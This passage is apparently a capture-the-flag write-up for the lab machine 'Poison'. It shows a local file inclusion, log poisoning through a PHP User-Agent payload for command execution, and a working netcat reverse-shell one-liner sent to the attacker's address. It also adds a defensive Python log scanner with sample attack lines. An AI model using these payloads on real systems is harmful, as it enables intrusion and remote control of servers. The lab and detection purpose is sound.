10.10.14.2 - - [31/Jan/2021:14:41:06 +0100] "GET /browse.php?dsadasasd HTTP/1.1" 200 321 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:25 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:41 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:42:27 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:09 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:17 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:48 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:52 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:22 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:44 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:02 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:21 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:53 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:02 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:20 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 3991 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:40 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:51:29 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:14:53:06 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4445 "-" "u505
Warning: system(): Cannot execute a blank command in /var/log/httpd-access.log on line 35
"
10.10.14.2 - - [31/Jan/2021:14:53:30 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"

With the cmd parameter filled, we obtain code execution as the www user.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=whoami" | grep u505
10.10.14.2 - - [31/Jan/2021:15:18:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1762 "-" "u505: www
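Everything in the two sections above (reading the log through the include, then planting PHP in the User-Agent) leaves traces in that same access log. As an added example from the defender's side, not part of the original write-up, here is a scanner for the combined LogFormat from the target's httpd.conf that flags the indicators this page shows: stream wrappers or absolute paths in the file parameter, a cmd parameter sent alongside an include, and PHP tags or shell-execution calls in the User-Agent or Referer. The sample log is constructed after the entries on this page; the names COMBINED_RE, classify and scan are this example's own.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat, as configured on the target:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# PHP stream wrappers in a file name, and PHP code in a logged header.
WRAPPER_RE = re.compile(r'(?i)\b(php|data|expect|zip|phar|file)://')
PHP_CODE_RE = re.compile(r'(?i)<\?(php|=)|\b(system|passthru|shell_exec|exec|eval)\s*\(')
SENSITIVE_PATHS = ("/etc/", "/var/log/", "/proc/", "httpd.conf")


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def classify(entry: dict) -> List[str]:
    """Return the indicator names that fire for one parsed entry."""
    findings: List[str] = []
    parts = entry["request"].split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    params = parse_qs(urlsplit(target).query)       # also percent-decodes
    for value in params.get("file", []):
        if WRAPPER_RE.search(value):
            findings.append("php_wrapper")
        if value.startswith("/") or ".." in value:
            findings.append("path_traversal")
        if any(p in value for p in SENSITIVE_PATHS):
            findings.append("sensitive_file")
    if "file" in params and "cmd" in params:
        findings.append("cmd_with_include")
    if any(PHP_CODE_RE.search(entry[h]) for h in ("agent", "referer")):
        findings.append("php_in_header")
    return findings


def scan(lines) -> List[dict]:
    """Parse each line and keep only the entries with at least one finding."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        found = classify(entry)
        if found:
            hits.append({"host": entry["host"], "time": entry["time"],
                         "request": entry["request"], "findings": found})
    return hits


# Constructed sample, modelled on the entries shown on this page.
SAMPLE_LOG = """\
10.10.14.2 - - [31/Jan/2021:12:54:39 +0100] "GET / HTTP/1.1" 200 289 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:54:50 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:16 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:20:01 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1960 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:52:10 +0100] "GET / HTTP/1.1" 200 289 "-" "<?php system($_GET['cmd']); ?>"
10.10.14.2 - - [31/Jan/2021:15:18:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log&cmd=whoami HTTP/1.1" 200 1762 "-" "curl/7.74.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["host"]} {hit["time"]} {hit["request"]!r}: {", ".join(hit["findings"])}')
```

The benign requests (the index page and the advertised listfiles.php) produce no findings, which is the property that keeps such a rule usable on a real log; the poisoning request itself is caught by the header check even though its request line is an ordinary GET /.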

We can test outbound connectivity: first, tcpdump monitors tun0 for ICMP.

u505@naos:~/HTB/Machines/Poison$ sudo tcpdump -i tun0 icmp
[sudo] password for u505:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

Send a ping from the target.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=ping+-c+1+10.10.14.2" | grep u505
10.10.14.2 - - [31/Jan/2021:15:18:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1762 "-" "u505: PING 10.10.14.2 (10.10.14.2): 56 data bytes

tcpdump captures the echo request coming from the target.

u505@naos:~/HTB/Machines/Poison$ sudo tcpdump -i tun0 icmp
[sudo] password for u505:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:19:00.572604 IP poison > 10.10.14.2: ICMP echo request, id 54786, seq 0, length 64
09:19:00.572636 IP 10.10.14.2 > poison: ICMP echo reply, id 54786, seq 0, length 64

Reverse shell

u505@naos:~/HTB/Machines/Poison$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We want to send this command to the target.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f

We URL-encode it and pass it as the cmd parameter.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.2+4444+>/tmp/f" | grep u505

The reverse shell opens.

u505@naos:~/HTB/Machines/Poison$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.84.
Ncat: Connection from 10.10.10.84:33918.
sh: can't access tty; job control turned off
$ whoami
www
$ ls -ltr
total 56
-rw-r--r--  1 root  wheel    33 Jan 24  2018 browse.php
-rw-r--r--  1 root  wheel    27 Jan 24  2018 info.php
-rw-r--r--  1 root  wheel    33 Jan 24  2018 ini.php
-rw-r--r--  1 root  wheel    90 Jan 24  2018 listfiles.php
-rw-r--r--  1 root  wheel   289 Jan 24  2018 index.php
-rw-r--r--  1 root  wheel    20 Jan 24  2018 phpinfo.php
-rw-r--r--  1 root  wheel  1267 Mar 19  2018 pwdbackup.txt

Now we can read pwdbackup.txt and decode it as shown earlier to obtain charix's password.

References

Daniel Simao 06:21, 31 January 2021 (EST)